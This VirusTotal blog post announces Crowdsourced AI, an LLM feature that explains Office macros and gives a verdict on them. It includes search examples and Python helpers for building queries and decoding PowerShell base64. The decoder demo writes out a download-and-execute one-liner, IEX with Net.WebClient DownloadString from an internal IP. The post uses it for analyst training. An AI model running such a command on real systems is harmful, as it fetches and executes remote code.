VirusTotal += Crowdsourced AI

We are pleased to announce the launch of Crowdsourced AI, a new initiative from VirusTotal, dedicated to leveraging the power of AI in tandem with community contributions. Spearheading this endeavor, Hispasec brings to the table an AI solution designed to analyze Microsoft document formats, particularly those containing macros, such as Word, Excel, and PowerPoint files. We extend a warm invitation to all interested parties to join this effort and explore innovative ways to contribute features that will strengthen the cybersecurity community.

About three months ago, we rolled out Code Insight, an AI tool that helps security analysts understand unfamiliar code snippets by explaining them in natural language. In a more recent Q&A, we invited anyone keen to contribute their own AI models or use cases to VirusTotal for the benefit of the community. Now, Hispasec has stepped in and added a powerful solution for Microsoft Office documents. They’re using a different AI model not only to explain the macros but also to deliver verdicts on any potentially malicious content, boosting VirusTotal’s capabilities.

In the words of the company:
“We are incorporating a specialized AI component from our Content Disarm & Reconstruction (CDR) solution, DeepClean, into VirusTotal. This component leverages a Large Language Model (LLM) to interpret and explain the code within macros in specific Microsoft document formats. Additionally, it offers a verdict—based on the model’s criteria—on whether the analyzed content can be considered malicious or benign. It’s important to emphasize that this is just one facet of DeepClean. Our broader solution recreates files into clean versions, eliminating executable code while preserving the essential content.”

This new integration not only bolsters our AI-driven security analysis but also exemplifies the strength in diversity, mirroring our existing initiatives like Crowdsourced IDS, Sigma, and YARA rules. In line with VirusTotal’s mission, we openly welcome various complementary solutions, reaffirming our commitment to a collaborative defense strategy against cyber threats.

Let’s look at a few examples of how the new Crowdsourced AI section, and Hispasec’s contribution to it, appear within VirusTotal.

In the example below, we see the verdict label “malicious” at the beginning of the explanation, emphasized in red for easy visibility. This is followed by a detailed description of how the macros within this .XLS file employ various obfuscation techniques. These include base64-encoded strings and the concatenation of variables with diverse names, in an attempt to disguise their behavior. However, the model sees through these measures and reveals the true intent of the macros: they attempt to download a script containing a PowerShell reverse shell and then execute it.

7d86b9e20b3c115afd2f02bd3bfc1eae754a7b4c37d5155990cc3267d67df56e

In this other example, the model labels a file as “benign”, with the verdict distinctly emphasized in green at the start of the detailed explanation. The report delves into the functionality of the various macros found within the file and their objectives.

24f05da105834088c604c0a2bd4987f092ad3d743d86b7200d835a61e490bc28

Search with Crowdsourced AI results

All the data generated by contributors in Crowdsourced AI is indexed and readily accessible via VirusTotal Intelligence. This means that analysts can now utilize this resource to perform targeted searches, streamlining their investigative processes. For a focused search by verdict, simply input “crowdsourced_ai_verdict:” followed by either “malicious” or “benign”. If you’re looking to search within the explanations provided by the AI, use the “crowdsourced_ai_analysis:” parameter followed by the specific text you’re interested in.
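As a rough illustration of the two modifiers above, here is a minimal Python sketch that assembles a search string. Only the modifier names and the two verdict values come from this post. The helper name `build_query`, the quoting of multi-word text, and the idea of joining both terms with a space are assumptions made for the example, not a description of how VirusTotal Intelligence parses queries.

```python
# Modifier names and verdict values are taken from the post.
VERDICT_MODIFIER = "crowdsourced_ai_verdict"
ANALYSIS_MODIFIER = "crowdsourced_ai_analysis"
ALLOWED_VERDICTS = {"malicious", "benign"}


def build_query(verdict=None, text=None):
    """Assemble a search string from the Crowdsourced AI modifiers.

    Hypothetical helper: joining terms with a space and quoting
    multi-word text are assumptions about the search syntax.
    """
    terms = []
    if verdict is not None:
        if verdict not in ALLOWED_VERDICTS:
            raise ValueError(f"verdict must be one of {sorted(ALLOWED_VERDICTS)}")
        terms.append(f"{VERDICT_MODIFIER}:{verdict}")
    if text is not None:
        # Wrap text containing spaces in quotes so it stays with its modifier.
        value = f'"{text}"' if " " in text else text
        terms.append(f"{ANALYSIS_MODIFIER}:{value}")
    if not terms:
        raise ValueError("provide a verdict, some analysis text, or both")
    return " ".join(terms)


if __name__ == "__main__":
    print(build_query(verdict="malicious"))
    print(build_query(text="192.168.45.239"))
```

The resulting string can be pasted into the VirusTotal Intelligence search box. Validating the verdict up front catches typos before a search is ever run.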

To illustrate the practical application of these search parameters, let’s walk through a scenario an analyst might encounter. Suppose you have received an alert from your SIEM pointing to the IP address 192.168.45.239. You want to find out if there is any document associated with this particular IP.

The search query “crowdsourced_ai_analysis:192.168.45.239” yields a .DOC file linked with the IP address.

Opening the sample returned by the search, we can read the AI description and find that the macro within the .DOC file uses the CreateProcess function to run an obfuscated PowerShell command. Decoding the base64 string reveals that this command downloads and executes a script from ‘hxxp://192.168.45.239/run.txt’.

5a1cad5a9e9be128aa4436540450b17b6716cb64711894078435266106870e6a
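For readers who want to repeat the decoding step by hand, the sketch below shows one common way to do it in Python. It assumes the base64 string follows PowerShell's encoded-command convention (UTF-16LE text), which the post does not state. The command in the demo is a hypothetical stand-in built inside the script, not the string from the sample above, and the helper names are ours.

```python
import base64


def decode_powershell_b64(encoded):
    """Decode base64 text, assuming PowerShell's UTF-16LE encoded-command convention."""
    raw = base64.b64decode(encoded, validate=True)
    return raw.decode("utf-16-le")


def defang(text):
    """Rewrite URL schemes so a decoded URL is not clickable in a report."""
    return text.replace("http://", "hxxp://").replace("https://", "hxxps://")


# Hypothetical command encoded here for the demo; NOT taken from the sample.
demo_command = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('http://192.168.45.239/run.txt')"
)
demo_encoded = base64.b64encode(demo_command.encode("utf-16-le")).decode("ascii")

decoded = decode_powershell_b64(demo_encoded)

if __name__ == "__main__":
    # Print the defanged form, as is customary when sharing indicators.
    print(defang(decoded))
```

If a macro stores the payload as plain UTF-8 instead, decoding as UTF-16LE will produce garbage or raise an error, so it is worth trying both before drawing conclusions.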

Join Crowdsourced AI

At VirusTotal, our commitment to facilitating collaboration within the security community is unwavering. This extends beyond merely integrating AI models and use cases into our platform. We’re also more than willing to supply datasets, comprising samples and metadata, to assist in training innovative security solutions.

If you’re using an AI model or have identified a use case that can enhance our collective security posture, we eagerly invite your contribution. Our goal isn’t confined to file and code analysis models; we are open to any use case applicable within the VirusTotal ecosystem. This includes, but is not limited to, explanation of static and dynamic analysis results; metadata extraction, summarization, and evaluation; applications related to domain names, URLs, and IP addresses; and solutions that tackle phishing and other sophisticated attacks.

By broadening our scope and welcoming diverse solutions, we aim to transform VirusTotal into a central hub for superior AI models and use cases across all aspects of the security domain. In doing so, we strengthen our community’s defenses and augment our capacity to counter a wide spectrum of cyber threats.

Thank you for being a part of the security community and supporting collective efforts to improve threat detection and response.

Story added 18 July 2023.